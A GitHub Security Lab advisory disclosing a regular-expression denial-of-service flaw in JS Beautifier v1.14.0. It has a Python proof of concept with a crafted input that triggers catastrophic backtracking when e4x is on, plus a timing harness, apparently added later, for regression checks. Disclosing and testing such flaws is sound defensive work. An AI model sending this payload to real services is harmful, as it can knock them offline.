December 10, 2021

GHSL-2021-113: ReDoS (Regular Expression Denial of Service) in JS Beautifier

GitHub Security Lab

Coordinated Disclosure Timeline

Summary

JS Beautifier contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).

Product

JS Beautifier

Tested Version

v1.14.0

Details

ReDoS

ReDoS, or Regular Expression Denial of Service, is a vulnerability in inefficient regular expressions, which can take an extremely long time to match when run on a crafted input string.

This vulnerability was found using a CodeQL query which identifies inefficient regular expressions. You can see the results of the query on JS Beautifier by following this link.

Vulnerability

The vulnerable regular expression is here.

Please follow these steps to reproduce the issue:

import jsbeautifier

# Crafted input from the advisory: a long run of "{a} " groups ending in an
# unterminated "{>", which makes the e4x/XML regular expression backtrack.
source = '''
return <- {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {>
'''

# With the e4x option enabled, beautifying this input takes far longer than
# its size warrants; that is the denial-of-service condition.
print(jsbeautifier.beautify(source, {'e4x': True}))
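The following harness is added here and is not part of the advisory or of JS Beautifier. It times the reproduction input above at growing sizes in a child process that can be killed on a deadline, so a regression test can flag superlinear growth in the e4x path without hanging; `beautify_e4x` is an assumed wrapper around `jsbeautifier.beautify`, and the size list and deadline are arbitrary choices.

```python
import math
import multiprocessing
import time

def build_poc(n):
    # Advisory input shape: n copies of "{a} " then an unterminated "{>".
    return "return <- " + "{a} " * n + "{>"

def beautify_e4x(source):
    import jsbeautifier  # assumed wrapper around the call in the reproduction
    return jsbeautifier.beautify(source, {"e4x": True})

def _worker(fn, arg, conn):
    start = time.perf_counter()
    fn(arg)
    conn.send(time.perf_counter() - start)

def timed_call(fn, arg, deadline):
    # Run fn(arg) in a child process and return elapsed seconds, or None if
    # the deadline passed (or fn raised). A runaway C-level regex match holds
    # the GIL, so a thread could not be interrupted; a child can be killed.
    ctx = multiprocessing.get_context("fork")
    parent, child = ctx.Pipe(duplex=False)
    proc = ctx.Process(target=_worker, args=(fn, arg, child))
    proc.start()
    child.close()
    proc.join(deadline)
    if proc.is_alive():
        proc.terminate()
        proc.join()
        return None
    return parent.recv() if parent.poll() else None

def growth_exponent(sizes, times):
    # Least-squares slope of log(time) against log(size): about 1 means
    # linear, 2 quadratic, far higher for exponential backtracking.
    xs, ys = [math.log(s) for s in sizes], [math.log(t) for t in times]
    mx, my = sum(xs) / len(xs), sum(ys) / len(ys)
    num = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    return num / sum((x - mx) ** 2 for x in xs)

def probe(fn=beautify_e4x, sizes=(8, 16, 32, 64), deadline=5.0):
    # (exponent, timings); exponent is None when a size hit the deadline.
    timings = {}
    for n in sizes:
        elapsed = timed_call(fn, build_poc(n), deadline)
        if elapsed is None:
            return None, timings
        timings[n] = elapsed
    return growth_exponent(list(timings), list(timings.values())), timings
```

Calling `probe()` against the unfixed version either returns a large exponent or a `None` exponent with the sizes that completed, and either result is a failing condition for a CI check.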

Impact

This issue may lead to a denial of service.

Credit

This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).

Contact

You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2021-113 in any communication regarding this issue.